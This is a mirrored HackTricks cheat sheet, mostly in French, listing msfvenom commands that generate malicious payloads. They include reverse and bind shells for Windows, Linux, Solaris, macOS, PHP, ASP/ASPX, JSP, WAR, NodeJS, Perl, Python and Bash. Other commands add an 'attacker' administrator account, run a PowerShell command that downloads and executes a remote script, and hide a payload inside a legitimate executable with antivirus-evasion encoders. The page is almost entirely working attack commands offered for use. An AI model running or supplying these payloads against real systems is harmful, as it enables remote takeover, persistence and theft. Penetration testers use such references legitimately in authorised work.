mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 00:20:59 +00:00
254 lines
8.1 KiB
Markdown
254 lines
8.1 KiB
Markdown
# MSFVenom - CheatSheet
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
|
|
|
|
**Hacking Insights**\
|
|
Engage with content that delves into the thrill and challenges of hacking
|
|
|
|
**Real-Time Hack News**\
|
|
Keep up-to-date with fast-paced hacking world through real-time news and insights
|
|
|
|
**Latest Announcements**\
|
|
Stay informed with the newest bug bounties launching and crucial platform updates
|
|
|
|
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
|
|
|
|
***
|
|
|
|
## Basic msfvenom
|
|
|
|
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
|
|
|
|
On peut également utiliser le `-a` pour spécifier l'architecture ou le `--platform`
|
|
|
|
## Listing
|
|
```bash
|
|
msfvenom -l payloads #Payloads
|
|
msfvenom -l encoders #Encoders
|
|
```
|
|
## Paramètres courants lors de la création d'un shellcode
|
|
```bash
|
|
-b "\x00\x0a\x0d"
|
|
-f c
|
|
-e x86/shikata_ga_nai -i 5
|
|
EXITFUNC=thread
|
|
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
|
|
```
|
|
## **Windows**
|
|
|
|
### **Reverse Shell**
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
|
|
```
|
|
{% endcode %}
|
|
|
|
### Shell de liaison
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
|
|
```
|
|
{% endcode %}
|
|
|
|
### Créer un utilisateur
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
|
|
```
|
|
{% endcode %}
|
|
|
|
### Shell CMD
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
|
|
```
|
|
{% endcode %}
|
|
|
|
### **Exécuter une commande**
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
|
|
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
|
|
```
|
|
### Encodeur
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
|
|
```
|
|
{% endcode %}
|
|
|
|
### Intégré dans un exécutable
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
|
|
```
|
|
{% endcode %}
|
|
|
|
## Charges utiles Linux
|
|
|
|
### Shell inversé
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
|
|
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
|
|
```
|
|
{% endcode %}
|
|
|
|
### Shell de liaison
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
|
|
```
|
|
{% endcode %}
|
|
|
|
### SunOS (Solaris)
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
|
|
```
|
|
{% endcode %}
|
|
|
|
## **Charge utiles MAC**
|
|
|
|
### **Shell inversé :**
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
|
|
```
|
|
{% endcode %}
|
|
|
|
### **Shell de liaison**
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
|
|
```
|
|
{% endcode %}
|
|
|
|
## **Charges utiles basées sur le Web**
|
|
|
|
### **PHP**
|
|
|
|
#### Shell inversé
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
|
|
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
|
|
```
|
|
{% endcode %}
|
|
|
|
### ASP/x
|
|
|
|
#### Shell inversée
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
|
|
```
|
|
{% endcode %}
|
|
|
|
### JSP
|
|
|
|
#### Reverse shell
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
|
|
```
|
|
{% endcode %}
|
|
|
|
### GUERRE
|
|
|
|
#### Shell Inversé
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
|
|
```
|
|
{% endcode %}
|
|
|
|
### NodeJS
|
|
```bash
|
|
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
|
|
```
|
|
## **Chargements utiles en langage de script**
|
|
|
|
### **Perl**
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
|
|
```
|
|
{% endcode %}
|
|
|
|
### **Python**
|
|
```bash
|
|
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
|
|
```
|
|
{% endcode %}
|
|
|
|
### **Bash**
|
|
```bash
|
|
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
|
|
```
|
|
{% endcode %}
|
|
|
|
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des hackers expérimentés et des chasseurs de bugs !
|
|
|
|
**Aperçus sur le hacking**\
|
|
Engagez-vous avec du contenu qui explore le frisson et les défis du hacking
|
|
|
|
**Actualités de hacking en temps réel**\
|
|
Restez à jour avec le monde du hacking en rapide évolution grâce à des nouvelles et des aperçus en temps réel
|
|
|
|
**Dernières annonces**\
|
|
Restez informé des nouveaux programmes de bug bounty lancés et des mises à jour cruciales des plateformes
|
|
|
|
**Rejoignez-nous sur** [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
|
|
|
|
{% hint style="success" %}
|
|
Apprenez et pratiquez le hacking AWS :<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Apprenez et pratiquez le hacking GCP : <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Soutenir HackTricks</summary>
|
|
|
|
* Consultez les [**plans d'abonnement**](https://github.com/sponsors/carlospolop) !
|
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Partagez des astuces de hacking en soumettant des PRs aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts github.
|
|
|
|
</details>
|
|
{% endhint %}
|